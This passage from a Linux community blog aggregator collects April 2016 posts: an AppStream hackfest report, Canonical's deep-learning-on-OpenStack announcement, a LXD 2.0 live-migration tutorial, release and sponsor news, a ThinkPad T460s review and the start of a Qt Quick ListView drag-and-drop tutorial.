    The most important thing for me though was to get together with people actually using AppStream metadata in software centers and also more specialized places. This yielded some useful findings, e.g. that localized screenshots are not something weird, but actually a wanted feature of Endless for their curated AppStore. So localized screenshots will be part of the next AppStream spec. Also, there seems to be a general need to ship curation information for software centers somehow (which apps are featured? how are they styled? added special banners for some featured apps, “app of the day” features, etc.). This problem hasn’t been solved, since it’s highly implementation-specific, and AppStream should be distro-agnostic. But it is something we might be able to address in a generic way sooner or later (I need to talk to people at KDE and Elementary about it).

    In summary…

    It was a great event! Going to conferences and hackfests always makes me feel like it moves projects leaps ahead, even if you do little coding. Sorting out issues together with people you see in person (rather than communicating with them via text messages or video chat), is IMHO always the most productive way to move forward (yeah, unless you do this every week, but I think you get my point 😀 ).

    For me, being the only (and youngest ^^) developer at the hackfest who was not employed by any company in the FLOSS business, the hackfest was also motivating to continue to invest spare time into working on these projects.

    So, the only thing left to do is a huge shout out of “THANK YOU” to the Ubuntu Community Fund – and therefore the Ubuntu community – for sponsoring me! You rock! Also huge thanks to Canonical for organizing the sponsoring really quickly, so I didn’t get into trouble with paying my flights.

    Laney and attente walking on the Millennium Bridge after we walked the distance between Red Hat and Canonical's offices.

    Laney and attente on the Millennium Bridge after we walked the distance between Red Hat and Canonical’s offices.

    To worried KDE people: No, I didn’t leave the blue side – I just generally work on cross-desktop stuff, and would like all desktops to work as well as possible 😉

    26 April, 2016 07:50AM by Matthias

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Dustin Kirkland: Keep OpenStack Weird



    The OpenStack Summit in Austin has already kicked off, and this time, Ubuntu is the official lanyard sponsor at OpenStack Summit Austin.

    The sponsorship contract for the OpenStack Summit explicitly states that only the official lanyard sponsor may distribute lanyards. Whilst we understand the reason that clause is there, we don't agree with it. It just doesn't seem very "open" nor in the spirit of OpenStack.

    Freedom of choice is an important aspect of all open source communities and one that we certainly champion, so attendees should be free to wear whatever branded lanyard they want with pride at the OpenStack Summit in Austin and we at Canonical will celebrate it.  My hometown here, Austin, prides itself on diversity, where we like to Keep Austin Weird!


    So please -- partners, customers, competitors, other OpenStack Sponsors: if you want to distribute your own lanyards then please go ahead safe in the knowledge that Canonical will not complain to the conference organizers.  Let's Keep OpenStack (a little bit) Weird, too!



    See you there!
    :-Dustin

    26 April, 2016 04:39AM by Dustin Kirkland (noreply@blogger.com)

    April 25, 2016

    hackergotchi for Ubuntu

    Ubuntu

    Ubuntu Weekly Newsletter Issue 463

    25 April, 2016 11:40PM by lyz

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: Making Deep Learning accessible on Openstack

    This week at the Openstack Developers Summit we are excited to showcase how Canonical with IBM, Mesosphere, Skymind and Data Fellas are working together to make the opportunities of deep learning easier for everyone to access.

    Deep learning is a completely new way of building applications. These applications, built around neuronet models rapidly become self learning and self evolving. Make no mistake this is, once again, a paradigm shift for our industry. It opens up a new world of very exciting possibilities.

    Deep learning allows complex, big software to skip many of the traditional design and development processes by having the software itself evolve. This is important since we quickly encounter significant constraints when building and deploying big software and big data projects. These constraints not only include the complexity of the operations involved but also include the very stark realisation that there are not enough people, with the required skills and domain expertise, to meet industry demand. Unless we find a smarter way of addressing these constraints then we will severely limit the speed at which our industry can liberate the opportunities of big software and deep learning in particular.

    At the heart of deep learning is the concept of neural networks that monitor a specific environment, searching for significant events and patterns and learning how best to adapt to these events and patterns. Of course a key part of this process is the period in which the artificial intelligence is in training. Once initiated the model continue to be self-improving as more data is analyzed over time.

    Across all industries we see meaningful applications of deep learning emerging. In healthcare a recent challenge was launched to improve the process and outcomes around cardiac diagnosis. In personal concierge services and in retail neural networks are being married to image recognition to drive recommendation engines. In natural language processing deep learning is being used not only to automate to a higher level of interaction with customers but to also understand, through sentiment analysis, when the experience is degrading and when a warm body needs to intervene. There are of course many projects and many stories that are emerging in deep learning. These only scratch the surface of what is possible. This begs the question – “Why are we not seeing an explosion of new, real world experiences constructed around deep learning?”

    The answer is that, as well as the constraints that were previously mentioned, there are also additional things to consider for anyone involved in this space. For instance, if you have a small set of data it is easy to set up a small project cheaply in a few days. When you start to tackle big data sets and to operate at scale your ability to do so quickly becomes significantly more challenging and your options become more limited.

    Canonical and Ubuntu underpin the world of scale-out architectures and automation around big software projects. We wake up every day thinking about how we can help simplify, codify, automate and unleash the potential of technology such as deep learning. That is why we have been working with partners such as IBM Power Systems, Mesosphere, Skymind and Data Fellas.

    • IBM Power Systems accelerates the processing of deep learning applications, using Coherent Accelerator Processor Interface (CAPI) or GPU attach to increase throughput. This performance will improve even further when NVLink becomes available.
    • Mesosphere supplies the mechanism to run distributed systems and containers as simple as using a single computer. It makes it easy to deploy and operate complex datacenter services like Spark.
    • Skymind is the commercial support arm of the open-source framework DeepLearning4j (the java/scala deep learning framework), bringing the power of deep learning to enterprise on Spark and Hadoop.
    • Data Fellas brings an Agile Data Science Toolkit bringing the full power of distributed machine learning in the hands of the new generation of data scientists.

    The first thing that we created is a model with Juju, Canonical’s Application Modelling Framework, that automates the process for building a complete, classic, deep learning stack. This includes everything from bare metal to essential interfaces. The model includes:

    • A data pipeline to push data into Hadoop HDFS.
    • An evolutive data computation stack made of Spark and Hadoop.
    • A Computing framework for the scheduling of Spark jobs based on Mesos.
    • An interactive notebook to create training pipelines and build Neural Networks.

    The system is modelled by Juju is deployed on IBM Power GPU enabled machines for performance and operated by Juju on LXD containers. The Juju model for this looks like this:

    We can provide guidance on how you can deploy your own machine/deep learning stack at scale and do your own data analysis. We believe that this early work significantly increases the ability for everyone to get their hands on classic big data infrastructure in just minutes.

    There are many use cases for deep learning and it’s hard to pick only one! However, Canonical is engaged heavily in major OpenStack projects in all sectors including telco, retail, media, finance and others. Our initial projects have therefore gravitated towards how we make operations around Openstack more performant.

    OpenStack Logs

    Canonical runs the OpenStack Interoperability Lab (OIL). With over 35 vendors participating and over 170 configuration combinations Canonical typically builds over 3500 Openstack every month to complete interoperability testing.

    This generates over 10GB of logs on OpenStack interoperability and performance every week. We use these log results to train the deep learning model to predict when an OpenStack cloud is going to fail. This produced two outcomes.

    First, even at an early stage, this showed an improvement over traditional monitoring systems that only assess the status based on how OpenStack engineers and operators have configured the monitoring of the solution. Intelligent agents were able to trigger alarms based on “feeling” the network, rather than on straight values and probabilities. This is a bit like a spam robot reducing the amount of work of support teams by notifying them of the threat level.

    Secondly, over time, as the cloud grows, losing a node becomes less and less manageable. These agents are able to make completely automated decisions such as “migrate all containers off this node” or “restart these services asap”

    The beauty of this is that it doesn’t depend on OpenStack itself. The same network will be trainable on any form of applications, creating a new breed of monitoring and metrology systems, combining the power of logs with metrics. Ultimately this makes OpenStack more reliable and performant.

    Network Intrusion

    We also applied our reference architecture to anomaly detection using NIDS (network intrusion detection) data. This is a classic problem for NeuroNets. Models are trained to monitor and identify unauthorized, illicit and anomalous network behavior, notify network administrators and take autonomous actions to save the network integrity.

    Several datasets were used for this initial proof of concept and the models used included:

    • MLP | Feedforward (currently used for streaming)
    • RNN
    • AutoEncoder
    • MLP simulated AutoEncoder

    If you are at the Openstack Developer Summit we will also be demonstrating this all week at the Ubuntu/ Canonical Booth A20. If you are attending the Summit please drop by if you would like to discuss and see our work in this area.

    If you are not attending the Openstack Summit and would like to start a conversation with Canonical to help us identify the applications and workloads that are most meaningful to you please get in touch with Samuel Cozannet. Or if you are keen to partner with us in this work please get in touch.

    25 April, 2016 08:49PM

    Stéphane Graber: LXD 2.0: Live migration [9/12]

    This is the ninth blog post in this series about LXD 2.0.

    LXD logo

    Introduction

    One of the very exciting feature of LXD 2.0, albeit experimental, is the support for container checkpoint and restore.

    Simply put, checkpoint/restore means that the running container state can be serialized down to disk and then restored, either on the same host as a stateful snapshot of the container or on another host which equates to live migration.

    Requirements

    To have access to container live migration and stateful snapshots, you need the following:

    • A very recent Linux kernel, 4.4 or higher.
    • CRIU 2.0, possibly with some cherry-picked commits depending on your exact kernel configuration.
    • Run LXD directly on the host. It’s not possible to use those features with container nesting.
    • For migration, the target machine must at least implement the instruction set of the source, the target kernel must at least offer the same syscalls as the source and any kernel filesystem which was mounted on the source must also be mountable on the target.

    All the needed dependencies are provided by Ubuntu 16.04 LTS, in which case, all you need to do is install CRIU itself:

    apt install criu

    Using the thing

    Stateful snapshots

    A normal container snapshot looks like:

    stgraber@dakara:~$ lxc snapshot c1 first
    stgraber@dakara:~$ lxc info c1 | grep first
     first (taken at 2016/04/25 19:35 UTC) (stateless)

    A stateful snapshot instead looks like:

    stgraber@dakara:~$ lxc snapshot c1 second --stateful
    stgraber@dakara:~$ lxc info c1 | grep second
     second (taken at 2016/04/25 19:36 UTC) (stateful)

    This means that all the container runtime state was serialized to disk and included as part of the snapshot. Restoring one such snapshot is done as you would a stateless one:

    stgraber@dakara:~$ lxc restore c1 second
    stgraber@dakara:~$

    Stateful stop/start

    Say you want to reboot your server for a kernel update or similar maintenance. Rather than have to wait for all the containers to start from scratch after reboot, you can do:

    stgraber@dakara:~$ lxc stop c1 --stateful

    The container state will be written to disk and then picked up the next time you start it.

    You can even look at what the state looks like:

    root@dakara:~# tree /var/lib/lxd/containers/c1/rootfs/state/
    /var/lib/lxd/containers/c1/rootfs/state/
    ├── cgroup.img
    ├── core-101.img
    ├── core-102.img
    ├── core-107.img
    ├── core-108.img
    ├── core-109.img
    ├── core-113.img
    ├── core-114.img
    ├── core-122.img
    ├── core-125.img
    ├── core-126.img
    ├── core-127.img
    ├── core-183.img
    ├── core-1.img
    ├── core-245.img
    ├── core-246.img
    ├── core-50.img
    ├── core-52.img
    ├── core-95.img
    ├── core-96.img
    ├── core-97.img
    ├── core-98.img
    ├── dump.log
    ├── eventfd.img
    ├── eventpoll.img
    ├── fdinfo-10.img
    ├── fdinfo-11.img
    ├── fdinfo-12.img
    ├── fdinfo-13.img
    ├── fdinfo-14.img
    ├── fdinfo-2.img
    ├── fdinfo-3.img
    ├── fdinfo-4.img
    ├── fdinfo-5.img
    ├── fdinfo-6.img
    ├── fdinfo-7.img
    ├── fdinfo-8.img
    ├── fdinfo-9.img
    ├── fifo-data.img
    ├── fifo.img
    ├── filelocks.img
    ├── fs-101.img
    ├── fs-113.img
    ├── fs-122.img
    ├── fs-183.img
    ├── fs-1.img
    ├── fs-245.img
    ├── fs-246.img
    ├── fs-50.img
    ├── fs-52.img
    ├── fs-95.img
    ├── fs-96.img
    ├── fs-97.img
    ├── fs-98.img
    ├── ids-101.img
    ├── ids-113.img
    ├── ids-122.img
    ├── ids-183.img
    ├── ids-1.img
    ├── ids-245.img
    ├── ids-246.img
    ├── ids-50.img
    ├── ids-52.img
    ├── ids-95.img
    ├── ids-96.img
    ├── ids-97.img
    ├── ids-98.img
    ├── ifaddr-9.img
    ├── inetsk.img
    ├── inotify.img
    ├── inventory.img
    ├── ip6tables-9.img
    ├── ipcns-var-10.img
    ├── iptables-9.img
    ├── mm-101.img
    ├── mm-113.img
    ├── mm-122.img
    ├── mm-183.img
    ├── mm-1.img
    ├── mm-245.img
    ├── mm-246.img
    ├── mm-50.img
    ├── mm-52.img
    ├── mm-95.img
    ├── mm-96.img
    ├── mm-97.img
    ├── mm-98.img
    ├── mountpoints-12.img
    ├── netdev-9.img
    ├── netlinksk.img
    ├── netns-9.img
    ├── netns-ct-9.img
    ├── netns-exp-9.img
    ├── packetsk.img
    ├── pagemap-101.img
    ├── pagemap-113.img
    ├── pagemap-122.img
    ├── pagemap-183.img
    ├── pagemap-1.img
    ├── pagemap-245.img
    ├── pagemap-246.img
    ├── pagemap-50.img
    ├── pagemap-52.img
    ├── pagemap-95.img
    ├── pagemap-96.img
    ├── pagemap-97.img
    ├── pagemap-98.img
    ├── pages-10.img
    ├── pages-11.img
    ├── pages-12.img
    ├── pages-13.img
    ├── pages-1.img
    ├── pages-2.img
    ├── pages-3.img
    ├── pages-4.img
    ├── pages-5.img
    ├── pages-6.img
    ├── pages-7.img
    ├── pages-8.img
    ├── pages-9.img
    ├── pipes-data.img
    ├── pipes.img
    ├── pstree.img
    ├── reg-files.img
    ├── remap-fpath.img
    ├── route6-9.img
    ├── route-9.img
    ├── rule-9.img
    ├── seccomp.img
    ├── sigacts-101.img
    ├── sigacts-113.img
    ├── sigacts-122.img
    ├── sigacts-183.img
    ├── sigacts-1.img
    ├── sigacts-245.img
    ├── sigacts-246.img
    ├── sigacts-50.img
    ├── sigacts-52.img
    ├── sigacts-95.img
    ├── sigacts-96.img
    ├── sigacts-97.img
    ├── sigacts-98.img
    ├── signalfd.img
    ├── stats-dump
    ├── timerfd.img
    ├── tmpfs-dev-104.tar.gz.img
    ├── tmpfs-dev-109.tar.gz.img
    ├── tmpfs-dev-110.tar.gz.img
    ├── tmpfs-dev-112.tar.gz.img
    ├── tmpfs-dev-114.tar.gz.img
    ├── tty.info
    ├── unixsk.img
    ├── userns-13.img
    └── utsns-11.img
    
    0 directories, 154 files

    Restoring the container can be done with a simple:

    stgraber@dakara:~$ lxc start c1

    Live migration

    Live migration is basically the same as the stateful stop/start above, except that the container directory and configuration happens to be moved to another machine too.

    stgraber@dakara:~$ lxc list c1
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | NAME |  STATE  |          IPV4         |                     IPV6                     |    TYPE    | SNAPSHOTS |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | c1   | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2         |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    
    stgraber@dakara:~$ lxc list s-tollana:
    +------+-------+------+------+------+-----------+
    | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
    +------+-------+------+------+------+-----------+
    
    stgraber@dakara:~$ lxc move c1 s-tollana:
    
    stgraber@dakara:~$ lxc list c1
    +------+-------+------+------+------+-----------+
    | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
    +------+-------+------+------+------+-----------+
    
    stgraber@dakara:~$ lxc list s-tollana:
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | NAME |  STATE  |          IPV4         |                     IPV6                     |    TYPE    | SNAPSHOTS |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+
    | c1   | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2         |
    +------+---------+-----------------------+----------------------------------------------+------------+-----------+

    Limitations

    As I said before, checkpoint/restore of containers is still pretty new and we’re still very much working on this feature, fixing issues as we are made aware of them. We do need more people trying this feature and sending us feedback, I would however not recommend using this in production just yet.

    The current list of issues we’re tracking is available on Launchpad.

    We expect a basic Ubuntu container with a few services to work properly with CRIU in Ubuntu 16.04. However more complex containers, using device passthrough, complex network services or special storage configurations are likely to fail.

    Whenever possible, CRIU will fail at dump time, rather than at restore time. In such cases, the source container will keep running, the snapshot or migration will simply fail and a log file will be generated for debugging.

    In rare cases, CRIU fails to restore the container, in which case the source container will still be around but will be stopped and will have to be manually restarted.

    Sending bug reports

    We’re tracking bugs related to checkpoint/restore against the CRIU Ubuntu package on Launchpad. Most of the work to fix those bugs will then happen upstream either on CRIU itself or the Linux kernel, but it’s easier for us to track things this way.

    To file a new bug report, head here.

    Please make sure to include:

    • The command you ran and the error message as displayed to you
    • Output of “lxc info” (*)
    • Output of “lxc info <container name>”
    • Output of “lxc config show –expanded <container name>”
    • Output of “dmesg” (*)
    • Output of “/proc/self/mountinfo” (*)
    • Output of “lxc exec <container name> — cat /proc/self/mountinfo”
    • Output of “uname -a” (*)
    • The content of /var/log/lxd.log (*)
    • The content of /etc/default/lxd-bridge (*)
    • A tarball of /var/log/lxd/<container name>/ (*)

    If reporting a migration bug as opposed to a stateful snapshot or stateful stop bug, please include the data for both the source and target for any of the above which has been marked with a (*).

    Extra information

    The CRIU website can be found at: https://criu.org

    The main LXD website is at: https://linuxcontainers.org/lxd
    Development happens on Github at: https://github.com/lxc/lxd
    Mailing-list support happens on: https://lists.linuxcontainers.org
    IRC support happens in: #lxcontainers on irc.freenode.net
    Try LXD online: https://linuxcontainers.org/lxd/try-it

    25 April, 2016 08:25PM

    LMDE

    Sucuri becomes Linux Mint’s 3rd biggest sponsor

     

    I’m happy to announce that Sucuri is now Linux Mint’s 3rd biggest sponsor.

    Sucuri is a security company, specialized in incident response, monitoring and protection for web sites. With thousands of clients, their cloud-based firewall handles more than 16 billion page views every single month, while their incident response team can remediate hundreds of sites on a single day.

    Working with Sucuri has been a great experience for us. Our project uses many servers spread across the world. Thanks to Sucuri’s expertise, their help and their products we were able to quickly recover from the attacks led on our distribution and set up malware monitoring and improved automated backups. Their firewall protects access to our servers and uses cache and compression techniques to speed up traffic on our web sites. Sucuri also helped us with the adoption of HTTPS and the hardening of our servers. We’re able to quickly get in touch and chat with them when needed. That proximity and relationship with our partners is very important to our project and their expertise in security is really appreciated.

    We’re proud to welcome Sucuri as our new sponsor and very grateful for the help they’re giving us.

    25 April, 2016 06:49PM by Clem

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: A DIY guide to the Aquaris M10 Ubuntu Edition tablet

    With the Aquaris M10 Ubuntu Editon tablet seeping into the hands of many and questions asked around how the tablet has the ability to take on various modes – we thought we’d create a DIY one-pager that shows you how versatile the tablet truly is! Check out the guide below to follow the steps…

    Download > M10 ‘DIY Guide’

    how to M10

    Learn more about the Aquaris M10 Ubuntu Edition tablet.

    10 cool M10 accessories to check out.

    25 April, 2016 03:20PM

    Ubuntu GNOME: Ubuntu GNOME 16.04 LTS is here

    xenial-facebook

    The brave fearless volunteers behind Ubuntu GNOME are very happy to announce
    the official release of Ubuntu GNOME 16.04 LTS supported for 3 years and
    this is our 2nd official Long Term Support (LTS) version.

    Before you upgrade or download, kindly make sure to read:
    https://wiki.ubuntu.com/XenialXerus/ReleaseNotes/UbuntuGNOME

    You may want to download from:
    http://cdimage.ubuntu.com/ubuntu-gnome/releases/16.04/release/

    We highly suggest to download via torrent.

    Ubuntu 16.04 LTS release announcement:
    https://lists.ubuntu.com/archives/ubuntu-release/2016-April/003720.html

    Special thanks to each and everyone who made it happen. You’re the best, no
    doubt about it.

    Yet another achievement 😀

    If you have any questions, please don’t hesitate to contact us.

    Thank you for choosing and using Ubuntu GNOME!

    Ali Jawad
    Ubuntu GNOME Release and Community Manager

    25 April, 2016 12:58PM

    Stuart Langridge: The wisest words spoken

    If all the world’s a stage
    Then light my way
    Because out, out your brief candle is not
    Four centuries past, yet I still cannot grasp
    That undiscovered country that makes words immortal
    If the good that men do is interred with their bones
    Then this precious stone is a beauty too rich
    Methinks it’s a jewel in the ear of us all
    As the wisest words spoken are spoken by fools

    from This Gives Life To Thee, performed by Akala, Nitin Sawhney, and Dane Hurst, as part of the BBC’s Shakespeare Live! From the RSC, 23rd April 2016.

    25 April, 2016 08:09AM

    hackergotchi for VyOS

    VyOS

    Would you participate in a VyOS conference if it existed?

    Hi everyone,

    Please note: this is not a call for papers or anything like that, this is absoluitely theoretical and no specific plans whatsoever were made, and we clearly have more important things to worry about, but we want to gauge interest to find out if there's a reason to ever think about it or not.

    If we were to have a VyOS conference, would you participate? What would be preferred location? How far would you agree to travel to attend it? What would you like to see there? What would you like to speak or listen about?


    25 April, 2016 06:30AM by Yuriy Andamasov

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Sam Hewitt: Lenovo ThinkPad T460s Review

    To replace my aging and broken ThinkPad E Series (the cheaper and plastic-er ThinkPad), getting the latest and greatest in ThinkPad was decidedly the best course to go. After much deliberation, the T460s was my choice. So after a couple weeks with it, here is my review.

    It's definitely a ThinkPad

    The T460s like all ThinkPads is an understated, matte black box with minimal branding. To give this box some toughness, Lenovo uses a combination of magnesium-alloy for the chassis plus carbon-fibre-reinforced plastic to surround the display for the lid, all of which feels very nice. The T460s is also much thinner and lighter than most of the other laptops Lenovo's ThinkPad lineup (save the X1 series) at 1.88 cm (0.74 in) tall and weighing just 1.36 kg (3.0 lb).

    Performance & Hardware

    While this model is configured with a dual-core Intel Skylake Core i5 chip at 2.80 GHz, it is configurable up to a Core i7, also dual-core, at 3.40 GHz, which isn't spectacular but is comparable with many other laptops in this class.

    Fortunately, the magnesium case isn't a unibody design and the innards are easily accessible by unscrewing a few Phillips screws in the base. Memory-wise, the T460s comes with either 4GB or 8GB integrated with the motherboard, but there is a single slot for up to 16GB of additional DDR4 RAM which allows for some upgradeability. The same goes for the removable solid-state (and only solid-state) drive.

    All this makes the T460s very quick to boot, but not necessarily a powerhouse. For me, it has enough performance for most tasks –it handles my graphics workload without a hitch.

    Battery Life, Heat & Noise

    The thinness of the T460s comes with a trade-off: you lose the swappable battery you find on most ThinkPads which is a good trade-off in my view. Instead the T460s has two 3-cell internal batteries (23Wh & 26Wh each) which gives it a purported max 10.5 hours of battery life however under pretty intensive use I've gotten more in the range of 7-8 hours.

    While it's plugged-in and charging the underside of the T460s does get a little warm, but not significantly, which is likely a side effect of the laptop being thin and it using its metal enclosure to passively disperse heat.

    Speaking of heat: fans. It has one, but not so you'd notice. Most of the time the T460s is dead silent thanks to its SSD and passive cooling, even on the rare occasion when the fan is running, it's so quiet you'd never know.

    Ports & Connectivity

    Keeping with ThinkPads' usefulness, Lenovo has crammed a tonne of ports into the sides of the T460s. The left hosts a single USB 3.0 port, a headphone jack and an SD card slot –the AC adapter plugs into this side as well. On right side you'll find 2 more USB 3.0 ports one of which is powered, HDMI out, a Mini DisplayPort, GigaBit Ethernet, a Kensington lock slot plus a SIM card & Smart card reader slot (regardless if you have either of those options).

    You also get the usual assortment of the latest connectivity hardware in this Thinkpad: Intel 802.11ac wireless, Bluetooth 4.1 and optionally a WWAN module, with all the latest wireless standards.

    Display

    The display is a 14" IPS non-touch display at 1920x1080, but you can upgrade to a 2K (2560x1440) display with or without multi-touch.

    Even at lowest configuration (1080p) the display is great, it's sufficiently bright and crisp with 250 nits and a 700:1 contrast ratio. Nearly all sane viewing angles are covered, as well a few insane ones since the display can open to a full 180° –why one would do this is beyond me– and the hinge its on is very rigid.

    Keyboard & Input

    The chiclet-style keyboard is an excellent typing experience, as you would expect from a ThinkPad, with ample travel on each key and a satisfying click. There are a few nice details like LED indicators for the FnLock and CapsLock keys as well as the Mute key, and I've opted to have the entire keyboard LED backlit as well. My only keyboard grievance is the Windows-specific keys in the function row, instead of more generic items –alas, this is a symptom of the Microsoft monopoly.

    Now the touchpad in this ThinkPad isn't best-in-class, but it's sufficiently large and sports multitouch support –software-permitting–. But many ThinkPad users, like myself, go in for the requisite TrackPoint and if you like it, then great, if not, it's never in the way and if anything the addition buttons above the trackpad are still useful regardless if you use the nub. And in my view the little bit of red among all the black is a nice aesthetic touch.

    Aside from the keyboard, nub and touchpad, the only other things on this side of the T460s are the power button and a fingerprint reader (which I haven't used, more on that later).

    Camera & Audio

    The 720p camera is a pretty standard webcam, which is paired with a dual-array microphone. The speakers, however, leave a bit to be desired. They're pretty much devoid of bass and at higher volumes things start to sound tinny. Also, being on the bottom of the laptop they will be slightly muffled if you happen to have the T460s on your lap or another soft surface. So stick to hard surfaces for the best sound or pack some headphones.

    (One audio-related annoyance that I can't really fault Lenovo for overlooking is that at some volumes certain frequencies will vibrate the anti-static plastic tape that is on the inside of the laptop covering parts of the motherboard. That's my theory at least, I haven't removed the tape to test it.)

    Does it run Linux?

    Since I and probably many of you care about Linux support, I'm glad to say it does. However, since the T460s is brand new hardware, there may be issues running distros that ship older kernels (but I haven't tested that so don't hold me to it). But I'm all about using the latest and greatest, and Ubuntu 16.04 installs and works without a hitch. Driver-wise, the only thing that has no support at all is the fingerprint reader –which is no big loss– but everything else works great. That being said, that painlessness is due to the fact that Ubuntu ships proprietary drivers, if you care about that sort of thing.

    The T460s comes with Windows 10, obviously, which is authenticated for Secure Boot (no entering license keys!) so you shouldn't have a problem reinstalling Windows 10 if you chose to do so.

    Bottom Line

    If you like the ThinkPad aesthetic (as I do) and don't mind the battery losses in exchange for a new thinner body and are looking for a great (Linux) laptop, then I'd very much recommend the T460s. The drawbacks it does have, lie mostly in with its mediocre speakers.

    In my view, the best ThinkPads are and always will be machines for getting stuff done without compromising performance, durability or productivity. If you'd prefer a laptop with a flashier design and higher specs for the sake of higher specs, or if you value things like brushed aluminum and pounding bass, look elsewhere. But know that none of those other laptops are a ThinkPad.

    • Hardware & Design9
    • Keyboard10
    • Touchpad8
    • Display9
    • Speakers7
    • Battery8
    • Heat & Noise8
    • Performance8
    • Linux Compatibility10

    25 April, 2016 05:00AM

    April 24, 2016

    Svetlana Belkin: Ubuntu 16.04

    A few days ago, the next  (long term support) release of Ubuntu was released code named Xenial Xerus.  Like many, I decided to upgrade, no, not like the last four times where I upgraded directly.  This time I decided to freshly install Ubuntu 16.04 because I started to run into the whole  “problems on top of problems” issue.  My other excuse was to see if  can write a pair of  scripts that can automate the backup/restore process. Which I was able to with the help of a fellow friend of mine: Simon Quigley.

    I used 16.04 for maybe a week before the release to test out the script and to also test out the system.  I hate to say this but I don’t really see or feel a difference between the last LTS and this one.  Perhaps, I didn’t explore it enough because I didn’t have time or maybe I’m still a basic end-user.  The only two differences I that noted was that fact that my favorite IRC client, X-chat, isn’t the repos but I can understand that since it’s not being maintained anymore and the other difference is that the file manger got a makeover for external drivers (now listed as “Other Locations”).

    Because of the difference that X-chat isn’t in the repos, I decided to switch to Irssi.   Also, I will kick off a new series of post titled, “What I use on Ubuntu”, and they will explain what programs I use and how I use them.

    24 April, 2016 09:15PM

    Aurélien Gâteau: Reordering a Qt Quick ListView via drag'n'drop - part 1

    It is common in user interfaces to provide the user with a list of elements which can be reordered by dragging them around. Displaying a list of elements with Qt Quick is easy, thanks to the ListView component. Giving the user the ability to reorder them is less straightforward. This 3 article series presents one way to implement this.

    The goal of this first article is to create a list which can be used like this:

    Reordering elements in a ListView

    Architecture

    The approach I used was to do all the work in a DraggableItem, leaving the ListView untouched. DraggableItem is used as the delegate of the ListView, and wraps the real QML item responsible for showing the details of the list element.

    Lets start with main.qml. Nothing fancy at the beginning, we create a Window and a ListModel defining our elements:

    import QtQuick 2.6
    import QtQuick.Window 2.2
    import QtQuick.Controls 1.4
    import QtQuick.Layouts 1.1
    
    Window {
        visible: true
        width: 500
        height: 400
    
        ListModel {
            id: myModel
            ListElement {
                text: "The Phantom Menace"
            }
            ListElement {
                text: "Attack of the Clones"
            }
            ListElement {
                text: "Revenge of the Siths"
            }
            ListElement {
                text: "A New Hope"
            }
            ListElement {
                text: "The Empire Strikes Back"
            }
            ListElement {
                text: "Return of the Jedi"
            }
            ListElement {
                text: "The Force Awakens"
            }
        }
    

    Now comes the main Item. It contains a ColumnLayout which holds a Rectangle faking a toolbar and our ListView, wrapped in a ScrollView:

    Item {
        id: mainContent
        anchors.fill: parent
        ColumnLayout {
            anchors.fill: parent
            spacing: 0
    
            Rectangle {
                color: "lightblue"
                height: 50
                Layout.fillWidth: true
    
                Text {
                    anchors.centerIn: parent
                    text: "A fake toolbar"
                }
            }
    
            ScrollView {
                Layout.fillWidth: true
                Layout.fillHeight: true
                ListView {
                    id: listView
                    model: myModel
                    delegate: DraggableItem {
                        Rectangle {
                            height: textLabel.height * 2
                            width: listView.width
                            color: "white"
    
                            Text {
                                id: textLabel
                                anchors.centerIn: parent
                                text: model.text
                            }
    
                            // Bottom line border
                            Rectangle {
                                anchors {
                                    left: parent.left
                                    right: parent.right
                                    bottom: parent.bottom
                                }
                                height: 1
                                color: "lightgrey"
                            }
                        }
    
                        draggedItemParent: mainContent
    
                        onMoveItemRequested: {
                            myModel.move(from, to, 1);
                        }
                    }
                }
            }
    

    We can see DraggableItem used as a delegate of the ListView. Its API is simple: it wraps another item which shows the content (here it is a rectangle with a text and a one-pixel border at the bottom).

    DraggableItem has one property: draggedItemParent, which defines which item becomes the parent of our content item while it is being dragged around. Setting this to the main content of your window gives a more natural feeling when you drag the item below or above the ListView: the item is not clipped to its view and appears on top of the other UI elements.

    It also has a signal: moveItemRequested, which is emitted when the user dragged an item from one place to another. In this example we use ListModel.move to react to this but if you use a custom model you could call any other method.

    DraggableItem implementation

    DraggableItem contains a contentItemWrapper item, which is the parent of the DraggableItem child. When we start dragging, contentItemWrapper is reparented to the item specified in the draggedItemParent property of DraggableItem.

    This is the beginning of DraggableItem.qml, it shows how contentItem is wrapped inside contentItemWrapper:

    import QtQuick 2.0
    
    Item {
        id: root
    
        default property Item contentItem
    
        // This item will become the parent of the dragged item during the drag operation
        property Item draggedItemParent
    
        signal moveItemRequested(int from, int to)
    
        width: contentItem.width
        height: contentItem.height
    
        // Make contentItem a child of contentItemWrapper
        onContentItemChanged: {
            contentItem.parent = contentItemWrapper;
        }
    
        Rectangle {
            id: contentItemWrapper
            anchors.fill: parent
    

    Lets finish the definition of contentItemWrapper and continue with the code necessary to start the drag:

    //
            Drag.active: dragArea.drag.active
            Drag.hotSpot {
                x: contentItem.width / 2
                y: contentItem.height / 2
            }
    
            MouseArea {
                id: dragArea
                anchors.fill: parent
                drag.target: parent
                // Keep the dragged item at the same X position. Nice for lists, but not mandatory
                drag.axis: Drag.YAxis
                // Disable smoothed so that the Item pixel from where we started the drag remains
                // under the mouse cursor
                drag.smoothed: false
    
                onReleased: {
                    if (drag.active) {
                        emitMoveItemRequested();
                    }
                }
            }
        }
    
        states: [
            State {
                when: dragArea.drag.active
                name: "dragging"
    
                ParentChange {
                    target: contentItemWrapper
                    parent: draggedItemParent
                }
                PropertyChanges {
                    target: contentItemWrapper
                    opacity: 0.9
                    anchors.fill: undefined
                    width: contentItem.width
                    height: contentItem.height
                }
                PropertyChanges {
                    target: root
                    height: 0
                }
            }
        ]
    

    A few things are worth noting here:

    To create a draggable area, we use a MouseArea with the drag.target property set to the Item we want to drag.

